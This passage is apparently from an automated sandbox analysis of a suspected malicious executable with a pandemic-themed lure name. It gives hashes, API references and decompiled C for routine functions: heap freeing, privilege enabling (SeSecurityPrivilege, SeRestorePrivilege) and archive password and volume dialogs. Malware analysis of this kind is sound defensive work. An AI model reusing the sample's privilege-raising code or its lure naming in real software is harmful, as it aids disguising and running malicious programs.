                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 9540fa5c1fc32c96e82a0c79f2adc2a796280d5edbf56498213acb6f697511cb
                                            • Instruction ID: 92d64ab6a05a1100ecff87e284f91cffd5570de4a3c83d736b01951391206e44
                                            • Opcode Fuzzy Hash: 9540fa5c1fc32c96e82a0c79f2adc2a796280d5edbf56498213acb6f697511cb
                                            • Instruction Fuzzy Hash: D6F01236A04600ABCA30EB65F885E1F7BD9AB047117645805F85EE7512C774FEC49A6C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C575DB, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 91%
                                            			E00C575DB(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xc6dd40; // 0x1192448
					if(_t7 != 0xc6db20) {
						E00C57A50(_t7);
						 *0xc6dd40 = 0xc6db20;
					}
				}
				E00C57A50( *0xc90410);
				 *0xc90410 = 0;
				E00C57A50( *0xc90414);
				 *0xc90414 = 0;
				E00C57A50( *0xc90860);
				 *0xc90860 = 0;
				E00C57A50( *0xc90864);
				 *0xc90864 = 0;
				return 1;
			}




                                            0x00c575e4
                                            0x00c575e8
                                            0x00c575ea
                                            0x00c575f6
                                            0x00c575f9
                                            0x00c575ff
                                            0x00c575ff
                                            0x00c575f6
                                            0x00c5760b
                                            0x00c57618
                                            0x00c5761e
                                            0x00c57629
                                            0x00c5762f
                                            0x00c5763a
                                            0x00c57640
                                            0x00c57648
                                            0x00c57651

                                            APIs
                                            • _free.LIBCMT ref: 00C575F9
                                              • Part of subcall function 00C57A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5B4F8,?,00000000,?,00000000,?,00C5B51F,?,00000007,?,?,00C5B91C,?), ref: 00C57A66
                                              • Part of subcall function 00C57A50: GetLastError.KERNEL32(?,?,00C5B4F8,?,00000000,?,00000000,?,00C5B51F,?,00000007,?,?,00C5B91C,?,?), ref: 00C57A78
                                            • _free.LIBCMT ref: 00C5760B
                                            • _free.LIBCMT ref: 00C5761E
                                            • _free.LIBCMT ref: 00C5762F
                                            • _free.LIBCMT ref: 00C57640
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 8f89db63a77affd875661de4915b0028f62625bd7797292acb06207522616939
                                            • Instruction ID: 07ce13147d596c4d6476b08626ca723e16f0b25bce73ba176c6967a1f1277c45
                                            • Opcode Fuzzy Hash: 8f89db63a77affd875661de4915b0028f62625bd7797292acb06207522616939
                                            • Instruction Fuzzy Hash: 43F054789082188F8A11BF36BC0971E37E4BB557123162217F912562B3CB7007C5BBDD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C56C73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E00C56C73(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00C5A7B3(_t52);
					GetModuleFileNameA(0, 0xc902b8, 0x104);
					_t49 =  *0xc90868; // 0x1183430
					 *0xc90870 = 0xc902b8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xc902b8;
					}
					_v8 = 0;
					_v16 = 0;
					E00C56D97(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00C56F0C(_v8, _v16, 1);
					if(_t64 != 0) {
						E00C56D97(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00C5A2CE(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xc9085c = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xc90860 = _t59;
									L16:
									E00C57A50(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xc9085c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xc90860 = _t43;
						goto L10;
					} else {
						_t44 = E00C57ECC();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00C57A50(_t64);
						return _t50;
					}
				} else {
					_t45 = E00C57ECC();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00C57DAB();
					return _t65;
				}
			}





















                                            0x00c56c73
                                            0x00c56c80
                                            0x00c56ca0
                                            0x00c56cb3
                                            0x00c56cb9
                                            0x00c56cbf
                                            0x00c56cc7
                                            0x00c56cce
                                            0x00c56cce
                                            0x00c56cd3
                                            0x00c56cda
                                            0x00c56ce1
                                            0x00c56cf3
                                            0x00c56cfa
                                            0x00c56d19
                                            0x00c56d25
                                            0x00c56d40
                                            0x00c56d43
                                            0x00c56d4a
                                            0x00c56d50
                                            0x00c56d57
                                            0x00c56d5a
                                            0x00c56d5c
                                            0x00c56d60
                                            0x00c56d6a
                                            0x00c56d6a
                                            0x00c56d6c
                                            0x00c56d72
                                            0x00c56d75
                                            0x00c56d77
                                            0x00c56d7d
                                            0x00c56d7e
                                            0x00c56d84
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c56d62
                                            0x00c56d62
                                            0x00c56d62
                                            0x00c56d65
                                            0x00c56d66
                                            0x00000000
                                            0x00c56d62
                                            0x00c56d52
                                            0x00000000
                                            0x00c56d52
                                            0x00c56d2b
                                            0x00c56d30
                                            0x00c56d32
                                            0x00c56d34
                                            0x00000000
                                            0x00c56cfc
                                            0x00c56cfc
                                            0x00c56d01
                                            0x00c56d03
                                            0x00c56d04
                                            0x00c56d39
                                            0x00c56d39
                                            0x00c56d87
                                            0x00c56d88
                                            0x00000000
                                            0x00c56d91
                                            0x00c56c88
                                            0x00c56c88
                                            0x00c56c8f
                                            0x00c56c90
                                            0x00c56c92
                                            0x00000000
                                            0x00c56c97

                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe,00000104), ref: 00C56CB3
                                            • _free.LIBCMT ref: 00C56D7E
                                            • _free.LIBCMT ref: 00C56D88
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _free$FileModuleName
                                            • String ID: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                            • API String ID: 2506810119-348105125
                                            • Opcode ID: 59cfbf72e038f0028c1cdbee4f06874b7cdc2d1fb6baf1ea561cc33771c96431
                                            • Instruction ID: 82a13c14fa23c8d4b21c623ccaf9de1a8016e0939c38da0b1eb36a26c6ab2d27
                                            • Opcode Fuzzy Hash: 59cfbf72e038f0028c1cdbee4f06874b7cdc2d1fb6baf1ea561cc33771c96431
                                            • Instruction Fuzzy Hash: 8531C079B00208AFCB21DF99D885A9EBBF8EB85311F604166FC0597211D6709E88DB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C373B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 63%
                                            			E00C373B9(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E00C4D870(E00C61321, _t61);
				E00C4D940();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E00C3399D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0xc70042 == 0) {
						if(E00C37A15(L"SeSecurityPrivilege") != 0) {
							 *0xc70041 = 1;
						}
						E00C37A15(L"SeRestorePrivilege");
						 *0xc70042 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0xc70041 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0xc6de80() == 0) {
						if(E00C3B32C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E00C36BF5(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E00C4E214(_t32);
							if(_t32 == 5 && E00C3FC98() == 0) {
								E00C31567(_t61 - 0x6c, 0x18);
								E00C40A9F(_t61 - 0x6c);
							}
							E00C36E03(0xc700e0, 1);
						} else {
							_t39 =  *0xc6de80(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E00C3159C(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}












                                            0x00c373b9
                                            0x00c373b9
                                            0x00c373b9
                                            0x00c373be
                                            0x00c373c8
                                            0x00c373d0
                                            0x00c373d3
                                            0x00c373d6
                                            0x00c373d9
                                            0x00c373dc
                                            0x00c373df
                                            0x00c373e4
                                            0x00c373e5
                                            0x00c373e6
                                            0x00c373ec
                                            0x00c373f4
                                            0x00c37401
                                            0x00c3740f
                                            0x00c37411
                                            0x00c37411
                                            0x00c3741d
                                            0x00c37422
                                            0x00c37422
                                            0x00c37430
                                            0x00c37433
                                            0x00c37434
                                            0x00c37438
                                            0x00c37438
                                            0x00c37439
                                            0x00c3743a
                                            0x00c3743d
                                            0x00c3743e
                                            0x00c3743f
                                            0x00c3744a
                                            0x00c37462
                                            0x00c37477
                                            0x00c37480
                                            0x00c37485
                                            0x00c37494
                                            0x00c3749c
                                            0x00c374ac
                                            0x00c374b4
                                            0x00c374b4
                                            0x00c374bd
                                            0x00c37464
                                            0x00c3746d
                                            0x00c37473
                                            0x00c37475
                                            0x00000000
                                            0x00000000
                                            0x00c37475
                                            0x00c37462
                                            0x00c374c3
                                            0x00c374c7
                                            0x00c374d0
                                            0x00c374da

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C373BE
                                              • Part of subcall function 00C3399D: __EH_prolog.LIBCMT ref: 00C339A2
                                            • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00C37485
                                              • Part of subcall function 00C37A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C37A24
                                              • Part of subcall function 00C37A15: GetLastError.KERNEL32 ref: 00C37A6A
                                              • Part of subcall function 00C37A15: CloseHandle.KERNEL32(?), ref: 00C37A79
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                            • API String ID: 3813983858-639343689
                                            • Opcode ID: 054d997575997cb870fddcf625a3a664dd62c645769ea016e3e28565fe3dc2a3
                                            • Instruction ID: a4c573190bb8975435700b7147365f3c915f5f52425658037a931bf6a9fa79f4
                                            • Opcode Fuzzy Hash: 054d997575997cb870fddcf625a3a664dd62c645769ea016e3e28565fe3dc2a3
                                            • Instruction Fuzzy Hash: B731E4B1A14208AADF30EB64DC41BFEBB78AF15310F148125F859A7192CBB49E44DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C49B8D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 62%
                                            			E00C49B8D(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E00C312D7(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xc8fe38 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xc8fe38), ( *0xc8fe38)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_push(0);
					_push(E00C3B943(__eflags,  *( *0xc8fe38)));
					_push( *( *0xc8fe38));
					_push(E00C3DA42(_t25, 0x8e));
					_t22 = E00C310B0(_t30);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xc8fe38));
					goto L13;
				}
				goto L6;
			}












                                            0x00c49b8e
                                            0x00c49b93
                                            0x00c49b98
                                            0x00c49b9d
                                            0x00c49bb5
                                            0x00c49c45
                                            0x00c49c47
                                            0x00000000
                                            0x00c49c47
                                            0x00c49bbb
                                            0x00c49bc1
                                            0x00c49c34
                                            0x00c49c36
                                            0x00c49c3c
                                            0x00c49c3f
                                            0x00000000
                                            0x00c49c3f
                                            0x00c49bc6
                                            0x00c49bda
                                            0x00000000
                                            0x00c49bda
                                            0x00c49bcb
                                            0x00c49bce
                                            0x00c49c2a
                                            0x00c49c30
                                            0x00c49c14
                                            0x00c49c15
                                            0x00000000
                                            0x00c49c15
                                            0x00c49bd0
                                            0x00c49bd3
                                            0x00c49c12
                                            0x00000000
                                            0x00c49c12
                                            0x00c49bd8
                                            0x00c49be3
                                            0x00c49bec
                                            0x00c49bf2
                                            0x00c49bfe
                                            0x00c49c00
                                            0x00c49c05
                                            0x00c49c07
                                            0x00000000
                                            0x00000000
                                            0x00c49c0e
                                            0x00000000
                                            0x00c49c0e
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00C312D7: GetDlgItem.USER32(00000000,00003021), ref: 00C3131B
                                              • Part of subcall function 00C312D7: SetWindowTextW.USER32(00000000,00C622E4), ref: 00C31331
                                            • EndDialog.USER32(?,00000001), ref: 00C49C15
                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00C49C2A
                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00C49C3F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemText$DialogWindow
                                            • String ID: ASKNEXTVOL
                                            • API String ID: 445417207-3402441367
                                            • Opcode ID: 8011e6662338a10e3a1895cee9239c6da987471e04228b9c659e0c3f679090c1
                                            • Instruction ID: eca4b49631a6fe4d83fc4e9a3b0371fedb09061401d43901fa6b1c74c5032d9f
                                            • Opcode Fuzzy Hash: 8011e6662338a10e3a1895cee9239c6da987471e04228b9c659e0c3f679090c1
                                            • Instruction Fuzzy Hash: 86118633744120BFD6219FA5DD89F6B7BA9FB4A700F140014F6029B1B2C7B29B529B29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3CE52, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C3CE52(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E00C411FA( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E00C3FA56(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E00C3D9DC();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x11a2da0
					_t30 = E00C54E71(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E00C3CC88);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0xc6d158 +  *_t30 * 0xc; // 0xc633e0
						E00C554E0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}














                                            0x00c3ce52
                                            0x00c3ce52
                                            0x00c3ce52
                                            0x00c3ce53
                                            0x00c3ce57
                                            0x00c3ce5e
                                            0x00c3ce64
                                            0x00c3ce74
                                            0x00c3ce7a
                                            0x00c3ce7e
                                            0x00c3ce81
                                            0x00c3ce8c
                                            0x00c3ce8c
                                            0x00c3ce94
                                            0x00c3ce97
                                            0x00c3ced2
                                            0x00c3ce99
                                            0x00c3ce99
                                            0x00c3ce9c
                                            0x00c3ceb1
                                            0x00c3ceb2
                                            0x00000000
                                            0x00c3ce9e
                                            0x00c3cea1
                                            0x00c3cea6
                                            0x00c3cea7
                                            0x00c3ceb7
                                            0x00c3ceba
                                            0x00c3cebc
                                            0x00c3cebd
                                            0x00c3cec2
                                            0x00c3cec2
                                            0x00c3cea1
                                            0x00c3ce9c
                                            0x00c3cede
                                            0x00c3cee4
                                            0x00c3cee8
                                            0x00c3cef2
                                            0x00000000
                                            0x00c3cef8
                                            0x00c3cefe
                                            0x00c3cf07
                                            0x00c3cf0f
                                            0x00c3cf0f
                                            0x00c3ce66
                                            0x00c3ce66
                                            0x00c3ce66
                                            0x00c3ce66
                                            0x00c3cf16

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __fprintf_l_strncpy
                                            • String ID: $%s$@%s
                                            • API String ID: 1857242416-834177443
                                            • Opcode ID: 5763930ae5b771bc2c56f4a08d0286be58a6343ae3e683300ccd6cc8e867381f
                                            • Instruction ID: 121535f205d541b6fd765b96dba4da2693b7b7fbff67d1c41da687e2077186e0
                                            • Opcode Fuzzy Hash: 5763930ae5b771bc2c56f4a08d0286be58a6343ae3e683300ccd6cc8e867381f
                                            • Instruction Fuzzy Hash: C721937285030CAEDF20DFA4CC85FEE3BA8EB05740F044126FE25A6191D375D655AB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4A0B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 83%
                                            			E00C4A0B0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00C312D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00C3E90C(_t24, 0xc85c00,  &_v260);
					E00C3E957( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                                            0x00c4a0ba
                                            0x00c4a0be
                                            0x00c4a0c2
                                            0x00c4a0db
                                            0x00c4a14a
                                            0x00000000
                                            0x00c4a14c
                                            0x00c4a0dd
                                            0x00c4a0e3
                                            0x00c4a144
                                            0x00000000
                                            0x00c4a144
                                            0x00c4a0e8
                                            0x00c4a0f7
                                            0x00000000
                                            0x00c4a0f7
                                            0x00c4a0ed
                                            0x00c4a0f0
                                            0x00c4a116
                                            0x00c4a128
                                            0x00c4a135
                                            0x00c4a13a
                                            0x00c4a0fd
                                            0x00c4a0fe
                                            0x00000000
                                            0x00c4a0fe
                                            0x00c4a0f5
                                            0x00c4a0fb
                                            0x00000000
                                            0x00c4a0fb
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00C312D7: GetDlgItem.USER32(00000000,00003021), ref: 00C3131B
                                              • Part of subcall function 00C312D7: SetWindowTextW.USER32(00000000,00C622E4), ref: 00C31331
                                            • EndDialog.USER32(?,00000001), ref: 00C4A0FE
                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00C4A116
                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 00C4A144
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemText$DialogWindow
                                            • String ID: GETPASSWORD1
                                            • API String ID: 445417207-3292211884
                                            • Opcode ID: d2ccb4ba2fd68b5d63a2ef5ebb385e2b39f2f424b49b68ab7bfc56c84925979e
                                            • Instruction ID: 1c03970931f52f4f4bcd7a8a2d29035f3ab342e6df70c2669d96608538b032d1
                                            • Opcode Fuzzy Hash: d2ccb4ba2fd68b5d63a2ef5ebb385e2b39f2f424b49b68ab7bfc56c84925979e
                                            • Instruction Fuzzy Hash: 07110432A80218BADB219E699D49FFF3B7CFB09700F000021FA57B20C0C6F19E5197A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3B1B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 70%
                                            			E00C3B1B7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E00C3B4C6(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E00C50BB8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E00C50BB8(_t23);
							if(_t13 == 0) {
								_t14 = E00C52B33(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00C54DDA(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E00C33E41(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}











                                            0x00c3b1b8
                                            0x00c3b1bf
                                            0x00c3b1c4
                                            0x00c3b1c7
                                            0x00c3b1ce
                                            0x00c3b1eb
                                            0x00c3b1ef
                                            0x00c3b1fa
                                            0x00c3b1fb
                                            0x00c3b1fc
                                            0x00c3b202
                                            0x00c3b205
                                            0x00c3b20a
                                            0x00c3b20b
                                            0x00c3b20c
                                            0x00c3b215
                                            0x00c3b21f
                                            0x00c3b217
                                            0x00c3b21b
                                            0x00c3b21b
                                            0x00c3b229
                                            0x00c3b22b
                                            0x00c3b230
                                            0x00c3b238
                                            0x00c3b23a
                                            0x00c3b23a
                                            0x00c3b205
